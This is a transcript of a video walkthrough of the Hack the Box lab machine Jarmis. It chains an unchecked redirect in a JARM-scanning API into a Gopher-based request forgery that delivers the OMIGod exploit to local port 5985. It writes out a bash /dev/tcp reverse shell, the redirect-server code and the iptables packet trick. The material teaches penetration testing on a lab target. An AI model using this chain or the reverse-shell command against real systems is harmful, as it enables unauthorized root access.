What's going on YouTube? This is IPSec. I'm doing Jarmis from Hack the Box, which was used on the UHC September Finals. That is the Ultimate Hacking Championship. And this box has a special place in my heart, not only because I created it, but it's probably one of the favorite boxes I created because it was modeled after a service I had wished existed, and maybe I'll follow through with this box and harden it and actually make it that service, which is just an application to try to find malicious TLS servers. Essentially, it gets a fingerprint of how SSL is configured using JARM, a technique by Salesforce, and then if it thinks it is malicious based upon JARM, it will go and query it for more metadata such as the host headers, cookies, etc. And that is where the vulnerability comes in. I did not specify not to follow redirects in the request library, so if it goes and queries a server and it sends it a 301 redirect, you can direct the service to other places, including the Gopher protocol. This service is supposed to be hosted on Azure, so port 5985 and 5986 is open and vulnerable to OMIGod, so you have to use that redirect like a server-side request forgery to go to Gopher to do an HTTP smuggling attack of the OMIGod Exploit. And I mean, I just really love that exploit chain, so let's jump in. As always, I'm going to start off with an nmap. So instead of -c, actually, I'm going to do -p- to do all ports because this is UHC and it's a competition. So I don't want to spend a lot of time waiting for my first step of recon to finish because I can't really begin until this finishes. So I'm going to do -p- all ports 1 through 65,535, -v show me ERP ports as it finds it. And then I have to make the directory nmap so I can place my result in there. And we can call this Jarmis-all ports, and then the IP address, 192.168.1.170. And we can see just two ports are open, SSH and HTTP. So before I go take a look at the actual web service, let's start our regular nmap scan. So this -p- is just going to be -p2280, and I can do -sc for default scripts, sv enumerate versions, and we'll go here, take off that all ports. So now we're doing a regular nmap scan on the box while we take a look at it. So 192.168.1.170 is what I said. And we go there, we get Jarmis as the title, and it just says loading. So what I'm going to do is press F2, go to the network tab, and again, I'm doing this just within Firefox. I'm not going to Burp Suite yet because I'm faster this way. About like competition stuff, it's all about time, so anything you can shave off is nice. So we can see it's trying to request jarmis.htb. I'm not getting anything here because it is just timing out. So let's do sudo vi etc host and add jarmis.htb. So 192.168.1.170, jarmis.htb, save that file, refresh the page, and now we get a blocked icon. So going over to the console tab, we can see the cross-origin request blocked because same origin policy disallowed us redirecting to a domain name when we used an IP address. So just instead of doing IP, we do jarmis.htb, and we have a website. So we can test this out, do one here, we get a signature. So now that we have this, I'm just going to test, like, is this a HTML? Looks like it is. Try PHP, not found. So right now, my thought is this is a static website or some type of JavaScript framework. I press Control-U, and it's looking more like probably something in like JavaScript, so React or Vue or something. Probably like React, just because I don't see what would look like Vue, but some JavaScript framework. Now, while I'm going to be poking at it, I'm going to run a GoBuster because, again, always do recon in the background. This has finished. We can see SSH, it's an Ubuntu server. Nginx also is telling us Ubuntu, and its web server is Nginx. Generally, when I see Nginx, I don't think PHP first. Just because it's more work to set up PHP on Nginx than it is Apache, and most PHP guides recommend Apache. So GoBuster dir-u http jarmis.htb-w for word list opt seclist discovery web raft small words.txt, and then we'll just do -out for out file, and we'll call it gobuster.out. And again, I'm not using any arguments because it didn't discover any. So we have /docs, /API, and /static. Now, one thing also I did not mention is that openapi.json file. Generally, when you have that, you have, was it here I saw it? Yeah, on this page. let's reload, the openapi.json, if we go to it, it will describe a lot of things. So this, and we get information about the API. GoBuster discovered the /API endpoint, and here we have it in this, saying API v1 search signature, saying how to use it. Most things that generate that file will also generate the docs directory, which is Swagger. And then also there is a little known one that redoc also exists. And this is just a different format to show that type of documentation. I don't think this lets me do like examples in the web browser like Swagger does. So I'm going to switch over to Swagger. So what you saw me doing here, I'm like clicking. I can't really edit too much. If I click this get, doesn't let me type there. So if I just go to /docs and I go here, I can say try it out, and I can actually like debug this in my browser, which is really cool. So looking at the web page, it is all about JARM, and JARM is very similar to like JA3 or JA3S hashes, and in that it's a way to fingerprint TLS. So a JARM is 62 characters. It's non-random. At least the first 30 characters are non-random. The last 32 are random. But to fingerprint SSL services. If you want to know more about it than just what's on that basic API page, I just recommend Googling JARM TLS maybe. Let's see what this does. Yeah, the Salesforce engineering. Here's a big blog post about it. Super cool to identify TLS services. So the first 30 characters are going to be all about the SSL configuration. JARM is going to send 10 different 10 different TLS hellos to try to fingerprint everything the server supports, and creates a 30-character signature based upon that. It's important to say it's signature, not hash. Maybe fuzzy hash is how they call it, but I'm being specific about that because it's non-random data. So if you see like the first 30 characters of two different things are very similar, they have very similar SSL configurations. It's not a hash where if one bit differed, it would be completely different. The last 32 characters is going to be the SHA-256 sum of extensions, and I know SHA-256 is greater than 32 characters. It is just a truncated version. So this is going to be the server. So if I ran like a Python web server and a Go web server, and I had them both exactly configured the same with SSL, they'd still differ because the extensions Python supports is different than Go. Even like the extensions may change between Go versions. If you run Sliver with like Go 1.6 and Go 1.7, it's going to have a different JARM because the Golang thing just changed internally between those two versions. But lastly, just like any like TLS fingerprinting, full collisions are possible and super likely. This is going to be why, like, when we dump the whole database, I don't have any Python C2s like Kodiak or Empire, because if you just stood up a Python web server and did the basic SSL, it would collide with everything and make this challenge a lot easier. So we remove those. So they are possible. That is why this service also utilizes metadata when deconfliction is necessary. And we'll come back to this hint in a little bit. But first, let's just experiment with the API. We can just use this to grab things. So we can see a signature here. And then if I go down to the search signature page, we can try it out. And it tells us what it's for. Search all signatures with a JARM. So we can paste that signature in, and we get the JARMS that is the same signature. So it looks like yahoo.co.jp is listing on a few IP addresses, but has all the same JARM signature. And then finally, we have fetch. And this says query an endpoint to receive its JARM and fetch metadata if it's malicious. So we can just try going to google.com. And if you do this on Hack the Box's website, this one may not work. You'll have to stamp your own TLS server because the box does not have internet. But you can see it is querying Google's JARM in real time. So we can also do all the same things through the front end. And this front end was coded by a friend, Waldo. I did the back end, he did the front end, because I am not a JavaScript guy, and he is. So we can see exactly how this works. We can grab, again, this hash, go to fetch signature, or search signature, grab it, go to fetch JARM, type in google.com, and everything seems to be working through the front end. Now, if we wanted to, one of the cool things about JARM, you can actually query Shodan with it. So I'm going to go shodan.io. Let's just log in real quick. I'm not going to tell you my password. It was password. No, it wasn't. But let's just search a website. I'm going to say GitHub. And I know this isn't how you search websites. It's going to get anything with like GitHub in the name. I don't really care. I'm going to go to this IP. And does this have HTTPS? I hope it does. I'm going to click port 443. That's what we want. So let's go to this website. And if I search JARM here, we don't get anything because, little known fact, not everything is in the regular view of Shodan. If you go to raw data and search JARM, we get this string, which is the JARM. And then you click it, you can see how to search JARMs in Shodan. So let me go back twice real quick because I just want to show that string does not exist on the regular view page. But you can search for JARM with ssl.jarm. So if we wanted to take the JARM we had found, we can just go here, grab this JARM, go to Shodan, paste this in, and we see 61 different results. And it kind of looks like this may be the page. It's a Japanese thing, Yahoo. So this said, whoops, it was actually a browser tab. It was a Japanese Yahoo website. But what I'm really interested in is anything that is malicious. We can see is malicious false. There are quite a bit of JARMs. So if I do like 100, goes to amazon.in. So what we want to do is grab them all. The easiest way, probably just reading the documentation and copying that curl command it does. So it tells you exactly what to do. So if I just ran like this curl request, so I paste this, and boom, we have the hit. So I'm going to do v crawl.sh, paste the curl in, and I'm going to do a for I in, is it range? Range 010. Let's see. Sequence. Sequence is bash. Range, I think, is Python. So sequence 0, let's say 300. I don't know how many are in here, but we'll just leave that. Done. And we can specify -o for out file. And I'm going to do i.json. And for ID, we don't want to call the same thing 300 times, so we're going to put I there. And put this in double quotes, not single quotes, because I think it was single quotes. It would not process this as a variable. So there we go. That looks good. Make dir JSON, and let's just move crawl in there. And we'll call bash. I didn't go into the directory. I just moved it. So bash crawl.json, and oh god, we have a lot of downloads. And we have 100, how high does this go? 299.json. Let's see if there's any data in it. If I cat it, we have null. So I'm going to grep for malicious on star, and we can see all the hits that have it in it, which is everything. So let's do T instead of F. And now we have all the ones that have true. So we have dumped now a few malicious ones. And let's see, what is a fun one we can play with? There's Cobalt Strike, so we can see how many Cobalt Strikes are on Shodan. So if we go back here, go to my Shodan thing, let's change this to be Cobalt Strikes. And we can kind of see if there's many false positives just based upon what it's returning, like the cookie. So this one is returning like cookie PHP BB3. So I'm guessing this is a collision and not a Cobalt Strike team server. 404 not found. Content security policy. So I'm guessing not all of these are going to be Cobalt Strike. Again, this is a lot of collisions happening. So that is why the application, upon detecting a collision, it grabs metadata from the website. Where is it? Let's say full collisions are possible. That's why the service also utilizes metadata when deconfliction is necessary. So I'm going to look back at this, and I can see sliver, cobalt, go fish, sliver, async rat. This one doesn't have anything. I don't know what this is. Trickbot, Metasploit, Silent Trinity. Here's a netcat one. And I can see a bunch of zeros here. And this is probably because netcat by default won't keep the connection alive once I connect. And like I said before, the JARM sends 10 different requests. So it just accepts the first one, and then all the other ones fail. And then that's why you see so many zeros. So we can kind of test this by just doing nc lvnp 443-SSL. -L and SSL are incompatible. Wait, is it --SSL? Yep. So we can do sudo. It's going to generate a random certificate. If I go back to Jarmis, I'm just going to use this field and see what my IP address is. If I do IP ADDR, grep 192, I am, oh, I have 2. I think I'm 1.230. I think this will go back. We can try this. Search, no, we want fetch, HTTPS, and paste this URL. And we have the JARM back. It's detecting it as not malicious. And the note has ncat question mark. And I think the reason why it's not malicious is because it tried to fetch metadata and couldn't. And since it couldn't fetch the metadata, it can't confirm this is ncat. If we give it something that is definitely malicious, it will probably remove that question mark. So let's just run Metasploit real quick. So sudo msfdb run, and we'll start up a handler and put like reverse HTTPS there. So use exploit multi handler, set payload. What is it? I always forget the first one. Windows Meterpreter x64. Is it Windows x64 Meterpreter? Is that a thing? Yep. Then we can do reverse HTTPS. Set L port to 443. Run. Set L host to, what is my adapter? This would normally be ton 0, but it is eth0 in this case. We can run it. And now when I go get it, we see Metasploit. It grabs Apache, which I think is Metasploit's default server header for here. And because it's metadata matched, the application is telling me true. So now we have a hard part of finding out what happens after it sends a request. Well, I already said that a JARM is going to send 10 different requests. So if we can use IPTables, we can grab 10 packets and then on the 11th packet, direct it somewhere else. After we do it with IPTables, I'm going to create a Metasploit script just because that's a bit easier, but IPTables I think is the easiest way to show this. So I'm going to stand this on 443. Actually, let's do the 2 netcats down here and we'll do IPTables up top. So let's grab this netcat. And this is like completing the trifecta in janky routing. If you didn't know, I created like a kernel module and I think validation to do some fancy routing based upon IP address. Then we used IPTables and subnetting to do another way. And this way we'll use IPTables to do something else really janky. So we have netcat listening on 443 and 8443. Now we're going to create the IPTables rule. So sudo IPTables. We're going to do -I for insert. We could do -A, but -A adds something to the bottom of a rule, and -I adds something to the top of the chain. I know I said rule before. It's actually like chains. And for this to take effect, you generally want to always have it at the top to make sure a rule doesn't come before it. That could change something. So pre-routing table. So before it does any routing, it's going to be in the NAT. We're going to say the protocol's TCP, which gives us the ability to specify the destination port. And we can also specify the destination address. And it's going to be 1.230. So this is going to match a packet coming into us. Now we're going to use the statistic module, and we're going to say mode nth. So this is going to be every nth packet. And we're going to say every 11 starting at packet 10. And this packet number decrements. So every packet this is going to get -1. Then we're going to do -J for action and redirect the 11th packet to port 8443. Okay. That looks good. Put that rule in. And we're going to fetch the request. And we get this failed SSL connection and then a connection back. Whoops. So the box is doing a GET request to us, and it's saying the user agent is curl, and here is the second flag for UHC. If you wanted the first flag, you would grep all the JARMs that you captured, and this isn't going to be on the Hack the Box platform because it's just 2 flags and it's user and root.txt. But for the actual competition, we needed 3, and the JSON's here. It's in 168. The note is not all dumps are exploits, which is fun because I remember there's always been posts about people just querying an API constantly to dump its entire database. So I love this path for an exploit thing. Anyways, the server is doing a GET request to us. So the attack here actually is, instead of, it does a GET and we can redirect it somewhere else. And it's a server-side request forgery. So if I do nc lvnp 70, if you know what port 70 is, kudos to you. But it's actually Gopher. So if I do curl 127.0.0.1 and specify Gopher : // we get the request. And Gopher's special because you can just put general text here, and I can craft a packet. So I can do get, is it %20? I can probably do plus. Probably %20 is the better one. /site %20 HTTP 1.1 %0D %0A host %20 for space 127.0.0.1. And this is testing my knowledge of writing a HTTP packet by hand. But I do this, and then the Gopher connects to port 70, and boom, writes that request. And if this is a follow, it's going to make the server go to this new page. So what the attack is doing is using this Gopher server-side request forgery to make an HTTP request from that server. Now, the cool thing about server-side request forgery is now that request comes from 127.0.0.1, or it also comes from inside the corporate network, so you can access other resources that you wouldn't normally be able to. Before we can really weaponize this, we should find out what ports are accessible over 127.0.0.1. So what I'm going to do is a fetch JARM, and I'm just going to fetch 127.0.0.1, and we get all zeros. I'm going to specify a port that probably exists, 22, and it just says endpoint nothing. Let's do 23, click enter, and still it's not really telling us anything. If we do port 80, what happens? We don't get anything. But now what happens if I just change this instead of HTTPS, because it doesn't listen on port 8. If I just put a regular HTTP in, still get nothing. If we specify a port that doesn't exist, nothing. And what I'm also going to do for good measure is to analyze the request to make sure the JavaScript engine isn't hiding anything from me. So let's go to Burp Suite. Intercept is on. I'm going to click go, send this over here, and we can see this is behaving exactly as the front end is telling us. Now, there's a really cool bug that was completely unintentional. If instead of using an IP address, we use the host name, we get now endpoint is set to null. And if we do a port that is listening, let's say 22, it's actually going to give us the endpoint. So now we have a way to query ports that are listening. Again, like awesome. So let's now go back to our crawl script, and we're going to do all ports. So let's go to make dir ports, cp, what was it, JSON crawl, copy that over into ports, and we can just change this request slightly. So this is searching ID. We probably want to do something different actually. Is the locate, no, I'm gonna use all ports. We can probably just use wfuzz, honestly. So let's use wfuzz to do this. We just first have to look at exactly the request that is being made, and we have that in Burp Suite. So this is what we want. Whoops. Grab this. And we can do wfuzz-z range 1 to 65,535 for all ports. And then paste this in, and localhost fuzz, and then --hs for hide string. And I'm going to hide everything with null. And I think that's it. Let's see, what did it just error on? wfuzz options payload. I think it wants the URL at the end, or I need to specify, oh wait, I did not specify the actual URL. HTTP jarmis.htp. And we can specify that with -u, I think, for URL. And there we go. Now we're fuzzing all open ports. It's hit 22 and 80. Those aren't a surprise to us. And we're already at around 1,000. So I'm going to pause the video and just let this keep on going. Whoa, we hit a lot that I did not expect. There's a 502, so invalid gateway. So that's weird. We may want to hide error code 502. Or hide, yeah, response 502. Another 502. But we have 5986 open. 8001 is open as well. So we can query those. So 5986. It gets translated to 127.0.0.1. And I think 5985 also, well, 5985 is behaving oddly. It's just stuck on waiting. No other port does that. So 5985. I wonder if this is the 502 error that we're getting. 5985 eventually returns with 200. So it just takes longer and returns with 200. We don't know what 8001 is, but 5986, that's hit the news lately on Linux. It's OMIGod. Not sure if you've known about it or not. If you haven't, there's been videos on my channel about the exploit. It's been a really fun one. So this looks like it's going to be a fun twist. We have to use server-side request forgery to exploit OMIGod. 5986 is SSL, so it's going to be really hard just to throw strings to that socket because we have to complete a TLS handshake in order to talk to it. But 5985 is the plain text version of it. So we can just jam the OMIGod payload on that socket and hope for the best. So what I'm going to do is close out of this, and we're going to copy OMIGod. I guess I can just go download the exploit again. If you're not familiar with it, OMIGod GitHub. And let's turn intercept off. And let's see, where is OMIGod GitHub? I don't know what just happened there with that search. Here we go. Horizon AI, I think. This looks fine. We can copy this exploit, git clone, v, or we can do cd cve 2021, and then we can edit OMIGod. We actually don't need to edit. We just need to get this string onto our clipboard. So what I'm going to do is set this to go through a proxy actually. So request right here. We can say proxies is equal to HTTP. Is this doing HTTPS? This one is doing HTTPS. So I'm just going to do HTTPS colon HTTP localhost 8080 to send this to Burp Suite. And we can run OMIGod against, it doesn't really matter the IP address. I'm just going to do 1.170-C. We'll do, let's do the bash reverse shell. So we can do echo-n. We got to paste the base 64. So I'm going to do echo-n bash-c. Wait, we don't have to do that. We don't have to do the bash-c. We can just do straight bash-i. Dev TCP 192.168.1.230, I think was me. Port 9001, 0 and 1. And the reason why I didn't have to do the bash-c here, or I opted not to do it, and I can do single quotes, is because when we execute this base 64 payload, we're already going to be executing with bash, so I know bash is executing this reverse shell. The reason why I always prep like bash-c before here is because I'm sending this to a web server, and the web server may be using like dash and not bash to execute the shell, which doesn't have like this capability to send a request to a network socket like this. So base64-w0, and we have this. So I can now put this in the header. And let's see, that's echo-n, base64-d, and pipe that to bash. Let's see. We need -t for target, like that. And this should have gone in Burp Suite. We can drop this request, drop that one, drop that, and here we go. We have the OMIGod request. So now I have to stand up a web server to handle this or send this request. So we can probably just use regular Python. I'm trying to think that Gopher, we can, let's see. I think we have to use SSL. So we have the payload. Now we got to build the server to execute it. So what I'm going to do is open up a, well, we can close this and just use the same pane. I'm going to try to stay organized, which is always tough to do. I'm going to make dir dub, and now we can begin the work. So the first thing is we have to generate a SSL cert. So I'm going to use OpenSSL request x509-new key RSA 4096 key out key.pem out cert.pem days 365, and we don't want a passphrase. So I'm going to do -no des. All the defaults. And we should have cert.pem and cat. This is key.pem. Okay. So let's do v serve.py, I guess. So I can do from HTTP server import HTTP server base HTTP request handler, and then import SSL class main handler. This is just like the skeleton code for simple HTTP server, or HTTP.server nowadays. So that def do get self print get. That's all I want to do right now. So now we got to set the socket up. HTTPD, HTTP server, listen on quad zeros, on port 8443. And the class we want to do is main handler. And now we have to set up the socket. So httpd.socket is equal to SSL wrap socket httpd.socket, and then key file is equal to probably key.pem, and then cert file is equal to cert.pem. Server side is equal to true. And then we can do httpd.serve forever. And let's see where I made a typo. Server side true. Let's see. Made the typo here. Let's see. Bast. It's base. There we go. This needs to be underscore, I think. There we go. So if I curl HTTPS localhost 8443 self-signed certificate -k, and we say get. So now what we can do is instead of printing get, we can also set the headers. So self send response 301, self send header. We're adding the location header. It's going to be Gopher 127.0.0.1 5985. And then this will be where the HTML goes. Not HTML, but URL encoded payload. But again, just testing if this works. So nc lvnp 5985. Execute this, and we can do a curl https 127.0.0.1 8443 specify -k and empty request. Oh, I don't think curl is by default following the request, so I'm going to do also -i and -v, and we can see, let's see, unsupported method head. Let's not do the -i. We do this get slash. Did it not send the redirect? Let's send this to Burp Suite. So go to the browser, burp, turn it on, HTTPS localhost 8443. Should go to the proxy tab. We can drop that request, send that one to repeater, go. And it is not sending us anything. So we have something wrong. So we probably have to end the headers like that. Set response. Click go. There we go. So now we got 301 moved permanently, and the new location is Gopher. So if I use this now and just curl this, it's not following the Gopher payload, but we can see we get this. So if we wanted to, we can test if this is going to work. So we can say serve.py, and the Gopher is going to go back to us. So I'm just going to say 192.168.1.230 because that's my IP of my box. We can leave it at that port, and we can say, please subscribe, I guess. So if on this socket, nc lvnp 5985, I get please subscribe, I was already listening, then we'll know it worked. So sudo nc lvnp 443-ssl or -ssl. And Python 3 serve.py. So if I go back to this and say fetch HTTPS 192.168.1.230 on port 443, it's going to discover that this netcat is malicious and then redirect me to this web server, which is then going to redirect the browser down here. Sent. We got this connection. We got a get. And server connects to us and says, please subscribe. So we know this is going to work. Now, the one difficult thing about this exploit is going to be knowing to change the location, or not the location, the header size. And by header size, I think I mean content length. Oh man, it's been a long video. But the reason for that is if we pipe this to output and rerun this exploit. So click send. Now we're rerunning it. We got a connection back. It's not outputting because we directed all output to output. If I XXD this, we can see after please subscribe, it is adding 2 bytes. That is the Gopher payload for terminating it. So if I just connect, so let's run this output 2 and nc localhost 5985, or actually let's just do an HTTP. So we're curl 127.0.0.1 5985. Close this. Less output 2, actually XXD output 2. And then with 0D 0A twice. But I don't know how to show this now. The Gopher is always going to append 2 things to the body. I think maybe I'd have to do a post request. Let's try output 2 again. We can say curl this -x, please subscribe. Is that going to, maybe it's -d for data. There we go. Let's look at output 2. There we go. Yeah. So the body on an HTTP request does not end with 0D 0A. So that's why it's not being appended. So that's going to be the main part of the challenge, is being able to discover that is happening blindly. So when we go back to the payload we want to run, which is this, we're going to want to increment this content length by 2. And I'm going to highlight everything. We're going to convert selection, URL. Actually, before I do this, let's highlight this. Burp Suites Magic 9001 is where I sent the request. So copy this, change URL encoding, key, let's do all characters. So we have just one big blob. We can now go to the server, so vi serve, and change the location to be that nasty string. And OXDF is going to probably create a more elegant way to do this. This is just how I'm doing it. And by more elegant, both me and him troubleshooted his method for quite a while trying to get it to work, and mine just worked pretty quickly. So his is easier to change commands with, mine just hand jam and hope for the best. So we can run that and go back to our fetch. So repeater, this, and we should nc lvnp 9001. So send this request, got here, got this JARM, and we're waiting for a reverse shell and do not get one. So something did not work, which is sad. This is the painful part to debug. Server-side request forgeries are not always easy to debug. Let's now decode everything. And I'm just going to run this payload and see if we get a reverse shell. So first, check payloads. Payload works. So that is not the issue. We can exit. So the next thing, what could be wrong? Looking at this, it's saying a post to WSMan, host 5986. Maybe we should change that to 5985. And let's see. What am I doing? V serve.py location. Oh, this needs to be 127.0.0.1. I never updated this back, so it sent me data on 5985. So let's put that to localhost and try again. Serve.py, netcat, listen on 9001, send the request, boom, boom, boom. And now we are root on the box, and we can go to /root ncat flag.txt, and that will be the entire box. I'm going to go back and we'll do this with Metasploit. But before I do it, if you're having trouble with this IPTables to do the forwarding thing and you're trying to reset the counter, this is a super annoying thing. I've mentioned it before. But if you just do IPTables -F to flush, it's not going to actually flush all the rules. Just like -L, we're not going to see our pre-routing rule because you have to specify -T-nat. So anytime you make a request to port 443 on yourself and you don't do it this way, your whole counter gets messed up and you're no longer going to send the 11th packet over to your malicious server. So to reset that, you do, let's see, -T-nat, -F, and then redo the IPTables command. Where is it? It's in pane 0, I think, pre-routing. And that's not it. Is it this top pane? Yeah. So you'd have to probably want to put like sudo IPTables -T-nat -F like that, and just keep this command on go. So what that's going to do, flush the nat table, then redo your pre-routing rule. So you reset that counter. But if you didn't want to use IPTables altogether, Metasploit is another good option. So to do it with Metasploit, we just want to look for a module that's already starting a web server. So I'm going to run msfdb, and I'll do use auxiliary server HTTP, maybe? What are the options here? Use auxiliary server capture, and there is some HTTP stuff here. So I'm just going to look for http_ntlm.rb. So locate this file to find out what directory it's in. So it's in user share Metasploit auxiliary server capture. And I'm going to go into this server. And what we want to do is just do a WC against all HTTP programs. And we'll say -L for line count because we just want to pick the most basic one. And funnily enough, HTTP basic is. So we're just grabbing a script that doesn't have many lines because we won't have to edit that much. I also have to create the directory sudo su, and we can make dir.msf4, I think. Okay, it already exists. So we can go in there and then make dir-p modules auxiliary server capture. And let's copy HTTP basic into that directory. So msf4 modules auxiliary server capture. So now that we're here, let's edit the script. So this module requires Metasploit, that's fine. Auxiliary, that's fine. I'm looking for like basic or something. So this name, we can update this. So this is going to be just, ooh, not mean to delete that whole line. So the name, let's do HTTP redirect. And description, setup, and I think it goes one more indent. Setup an HTTP server and redirect. Okay, that doesn't go in quotes, I think. That's weird. We'll put the author, IPSEC, and then actions. We're not capturing, we're now redirecting. And this is just going to be run redirect web server. Passive action, maybe redirect. I don't know exactly what this is. Default action, redirect. Okay, so now it's going to be registering options. We need serve port, that's good. Redirect URL, that's good. And I'm also going to create another one called SSL because it looks like this one does not have it. So opt_pool.new SSL, And what is this code look like? So I'm going to exit-f. That's not what I want. We can just exit here. Let's go back into the capture server and let's find one that has that option. So capture HTTP NTLM SSL. Let's go into that directory. grep-i SSL HTTP star. Let's see. None of these have it. Weird. So let's see. I want to say it is a Boolean, and then this will be the description. So negotiate SSL, and then another Boolean. I think that's default. So if we error out, it's probably going to be around here. And IPv6, we don't need it. Default run, we don't have a realm. And then it's going to exploit. We're not stealing creds, so I'm just going to delete this report cred function. And then on request URL. So we don't have a concept of a authorization header, so we can remove this. We aren't reporting any credentials. We can remove that. But we do have redirect URL. And we send the redirect. So CLI data store redirect URL, else we just send response. And that may be it of the program. This send response test. I have no idea what this will do, but okay. So now we have HTTP basic.rb. So let's rename this to HTTP forward. And then when we do sudo msfdb run, we may be able to use this module if we did everything correctly. So let's copy this, use HTTP basic NTLM. No. So like a rebuild cache. Let's see. The following modules could not be loaded. See log for details. So we did something wrong. Less unexpected that, expecting end on line 34, 33. So let's go back here, HTTP 33. So it is here. Let's see. I'm guessing we did not open or close something correctly. So this parenthesis does match. These quotes match. These brackets match. So true, comma, these double quotes match. And that is good. We didn't modify up here, so I don't think that's going to be the issue. And that's closed. That's fine. That's closed. Register options. That's all closed. We got an end here. I'm not seeing the error, but it's probably a case of me being blind. So we do if here. Well, let's get rid of that if then. And I think that means we get rid of an end, maybe? Maybe not. Do we use if and anywhere else? So that ends this def. Let's try it. Exit-f. Run it. And we'll look at the logs again when we can't load it. So, can't load it. Look at the log, forward. So expected, end of input, expecting end. Syntax error 33. So it doesn't like that optimal piece. Everything is terminated properly. Oh wait, there's a comma at the end of here. No comma there. See if that fixes it. I know there's a command to rebuild the modules. Don't know off the top of my head, so that's why we're doing this every time. So I don't see Ford failing to load, which is a super good sign. Let's use it. So use capture this. And let's see. HTTP _ forward. Show options. Show options if I type it correctly. We got server port. Let's set SRV port to 443. Set SSL true. It already is. We can, I think, just run it. And now if I curl -I on this IP address with -k-v, let's see if we get the redirect. We do. So it's moved and the location is nothing because we did not set a redirect URL. I'm going to do jobs, kill 0, show options, set redirect URL to be, let's see, we can just redirect them to our Python web server. So HTTPS 192.168.1.230. So we set this. It could also be set to like that Gopher thing, but this is the easier way to just run it. So when we run this, now we can run our web server. Do I still have it? Don't have it running. So exit the pane, restart it. ls, we did it in www, python 3, serve.py, and I gotta remember, this starts on, or runs on 8443. So now when I run that, if I do a curl https here, see -k, it redirects us to this web server. And by printing out whenever I get something, vserv print get IAM. So nc lvnp 9001, we can go back to Jarmis and fetch. Or maybe I was using it in Burp Suite. So we're going to go to Metasploit. Metasploit's going to send a redirect. That redirect is going to go here. And then this is going to send it to OMIGod. It's going to do HTTP smuggling to go to port 5985, which then exploits it and sends us a reverse shell to 9001. It's a long attack chain, but we send it, redirecting client to here, and nothing. But our serve is not sending anything. I expected to see a get, but I'm not seeing anything. Let's see. curl -k https 127.0.0.1. Empty reply for server /t. So -v. Let's see. What am I screwing up? We do the get, and then it dies. What? This literally just worked the last part of the video. There's nothing different about this. Set true. We're ending the headers. That's that crappy like code to send the payload. So on get, we should print get. and then send response. Python 3 serve. Oh, 8443. Yeah, so we get like that. Ping 192.168.1.230, IP ADDR grep 230. That is my IP. So why does this not follow? curl-k-i-v. Oh, so it will do the redirect if we give it this full URL, but if I don't give it this URL, we get just that empty error. And this isn't printing any error logs. So what I have to do is just go back here and give it the full URL. Put a space there, and this will work. I'm somewhat confident, maybe half confident it will work. Send, boom, we got it. Redirecting client to this server and then getting a shell. I think we'd probably be able to use Metasploit to just send the Gopher payload, but I'm not positive. I guess we can test it real quick since I have nothing but time right now. So let's do vserve.py and let's copy this whole redirect. I can copy the quotes too. That should be fine. Let's see. Probably want to do it in cat serve.py. If I didn't VI, my copy and paste would be weird. So that's why I didn't cat. Let's copy everything. And then set redirect URL. That's not it. Set redirect URL. Paste this whole thing, and this is going to be kind of curious if it works. NCLVMP. Okay, so that is all set. I think I put a single quote at the start of it. We'll try it. Looks good. Let's just run it, and this is going to be interesting. So copy this whole URL, paste it here. Listening on 9001. This web server is done. Send it. And yes, we can do it with just Metasploit by pasting the URL that way. So that'll be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.